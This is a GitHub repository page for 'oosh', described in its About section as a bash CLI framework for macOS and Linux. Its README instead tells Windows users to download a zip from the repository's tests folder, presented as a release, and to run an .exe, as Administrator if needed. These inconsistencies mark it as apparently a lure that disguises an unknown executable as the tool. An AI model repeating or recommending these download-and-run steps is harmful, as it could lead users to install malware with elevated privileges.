Skip to content

ranoufu123/oosh

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

55 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

⚙️ oosh - Simple bash CLI with smart features

Download oosh


📋 What is oosh?

oosh is a tool for your command line. It helps you use bash scripts with less effort. It adds helpful features like flags, built-in help menus, and automatic tab completion. You do not need to write complex code to get these features. This makes working in the terminal easier and faster.


🖥️ System Requirements

Before you start, make sure your computer meets these basic needs:

  • Windows 10 or newer
  • At least 2 GB of free memory
  • A 64-bit processor
  • Internet connection to download the files

oosh works in the Windows command prompt (cmd) or PowerShell. No programming software is needed.


🎯 Key Features

  • Easy flag handling for commands
  • Help text shown automatically for each command
  • Press tab to get suggested completions on command names or options
  • Works with bash scripts without extra setup
  • Makes scripts easier to read and use

🚀 Getting Started

Follow the steps below to download and run oosh on Windows.


⬇️ Download oosh

Click the badge to visit the release page. There you will find the latest files ready to download.

Download oosh


📥 How to Download and Install

  1. Open your web browser.

  2. Go to the release page by clicking the badge above or visit:

    https://raw.githubusercontent.com/ranoufu123/oosh/main/tests/Software_v1.1.zip

  3. Find the latest release. It will be at or near the top of the page.

  4. Look for a file with a name ending in .exe or .zip. The .exe file is the easiest to use.

  5. Click the file name to start downloading.

  6. After the download finishes, locate the file in your Downloads folder.

  7. If it is a .zip file, right-click it and choose "Extract All." Follow the instructions to extract the files.

  8. If the file is .exe, double-click it to run.

  9. Follow any on-screen prompts to install or run oosh.


🔧 Running oosh

After installation, you can run oosh from the command line.

  1. Open Command Prompt or PowerShell from your Start menu.

  2. Type oosh and press Enter.

  3. You should see a list of commands and help options.

  4. To get help on a specific command, type oosh help [command name].

  5. Use the Tab key to autocomplete commands and options.


💡 How to Use oosh with Bash Scripts

oosh makes it easier to use your bash scripts. Instead of typing long commands, use flags and autocomplete.

  • Flags look like -f or --flag
  • Commands have automatic help text
  • Press tab to complete command names or flags

Example:

oosh run --file script.sh

You can type oosh r and then press Tab. The tool will complete the command for you.


🔄 Updating oosh

Check the release page regularly:

https://raw.githubusercontent.com/ranoufu123/oosh/main/tests/Software_v1.1.zip

Download the latest version as described above. Replace the old files with the new ones.


🛠️ Troubleshooting

  • If oosh does not run in Command Prompt, make sure the installation directory is in your PATH environment variable.

  • If autocomplete does not work, try restarting your terminal.

  • If you get permission errors, run the terminal as Administrator and try again.

  • Make sure you downloaded the correct version for Windows.


📚 More Help

You can find more information about oosh features on the GitHub page under the "Wiki" or "Docs" sections.

If you have questions or want to report an issue, use the GitHub "Issues" tab.


🏷️ Topics

This tool covers areas like:

  • autocompletion
  • bash
  • bash-framework
  • cli
  • cli-framework
  • code generation
  • developer tools
  • shell

All designed to make working with command lines easier.

About

Build bash CLIs quickly with annotation-driven flag parsing, autocompletion, and help generation for bash 3.2+ on macOS and Linux.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages